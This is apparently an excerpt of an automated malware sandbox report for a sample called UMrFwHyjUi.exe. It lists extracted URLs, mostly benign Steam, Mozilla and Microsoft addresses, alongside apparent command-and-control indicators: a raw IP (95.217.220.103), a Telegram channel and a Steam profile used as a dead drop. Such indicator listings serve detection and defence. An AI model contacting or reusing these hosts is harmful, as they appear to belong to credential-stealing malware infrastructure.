                                                                                      http://www.mozilla.com/en-US/blocklist/UMrFwHyjUi.exe, UMrFwHyjUi.exe, 00000002.00000002.2720919729.000000006CEFD000.00000002.00000001.01000000.00000009.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2701990991.000000002400B000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.2.drfalse
                                                                                        		unknown
                                                                                        https://mozilla.org0/UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2701990991.000000002400B000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694383485.000000001E097000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2555099194.0000000000E09000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://95.217.220.103/rosoftUMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988407679.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2003941847.0000000000DA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://community.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCUMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                            		unknown
                                                                                            http://store.steampowered.com/privacy_agreement/UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://community.steamstatic.com/public/css/skin_1/profilev2.css?v=t9xiI4DlPpEB&l=englishUMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                              		unknown
                                                                                              https://store.steampowered.com/points/shop/UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://t.me/lpnjokeUMrFwHyjUi.exe, UMrFwHyjUi.exe, 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=UMrFwHyjUi.exe, 00000002.00000003.2285755720.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, CFHDHI.2.drfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaUMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E07000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E5F000.00000004.00000020.00020000.00000000.sdmp, CAAEBF.2.drfalse
                                                                                                  		unknown
                                                                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016UMrFwHyjUi.exe, 00000002.00000003.2264867503.0000000000E60000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2690322571.00000000176CC000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2121165868.0000000000E82000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, FHJEGI.2.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://sketchfab.comUMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://www.ecosia.org/newtab/UMrFwHyjUi.exe, 00000002.00000003.2285755720.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, CFHDHI.2.drfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://lv.queniujq.cnUMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brJDGCFB.2.drfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://www.youtube.com/UMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://community.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngUMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                                        		unknown
                                                                                                        https://store.steampowered.com/privacy_agreement/UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        https://95.217.220.103/.UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2003941847.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://community.steamstatic.com/public/javascript/applications/community/main.js?v=W9BXs_p_aD4Y&amUMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                                            		unknown
                                                                                                            https://95.217.220.103/-UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2555099194.0000000000E12000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2003941847.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://steamcommunity.com/profiles/76561199786602107/inventory/UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                                                		unknown
                                                                                                                https://95.217.220.103/9MUMrFwHyjUi.exe, 00000002.00000003.2003941847.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://95.217.220.103/)UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zUMrFwHyjUi.exefalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    https://www.google.com/recaptcha/UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      https://checkout.steampowered.com/UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      https://community.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwUMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                                                        		unknown
                                                                                                                        https://95.217.220.10376561199786602107[1].htm.2.drfalse
                                                                                                                          		unknown
                                                                                                                          https://store.steampoUMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesFHJEGI.2.drfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            https://store.steampowered.com/;UMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            https://community.steamstatic.com/public/css/promo/summer2017/stickers.css?v=P8gOPraCSjV6&l=englUMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                                                              		unknown
                                                                                                                              https://store.steampowered.com/about/76561199786602107[1].htm.2.drfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              http://cowod.hoptoECAKEHIUMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                https://steamcommunity.com/my/wishlist/UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                                                                  		unknown
                                                                                                                                  https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFJDGCFB.2.drfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  https://community.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL&l=UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                                                                    		unknown
                                                                                                                                    http://ocsp.sectigo.com0UMrFwHyjUi.exefalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    https://help.steampowered.com/en/UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    https://95.217.220.103/ographyUMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      https://steamcommunity.com/market/UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                                                                        		unknown
                                                                                                                                        https://store.steampowered.com/news/UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        		unknown
                                                                                                                                        https://community.steamstatic.com/public/javascript/global.js?v=7qlUmHSJhPRN&l=englishUMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                                                                          		unknown
                                                                                                                                          https://steamcommunity.com/profiles/76561199786602107g0b4cMozilla/5.0UMrFwHyjUi.exe, 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            https://community.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=englishUMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                                                                              		unknown
                                                                                                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=UMrFwHyjUi.exe, 00000002.00000003.2285755720.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, CFHDHI.2.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              http://store.steampowered.com/subscriber_agreement/UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#UMrFwHyjUi.exefalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgUMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drfalse
                                                                                                                                                		unknown
                                                                                                                                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17UMrFwHyjUi.exe, 00000002.00000003.2264867503.0000000000E60000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2690322571.00000000176CC000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2121165868.0000000000E82000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, FHJEGI.2.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                		unknown
                                                                                                                                                https://recaptcha.net/recaptcha/;UMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                		unknown
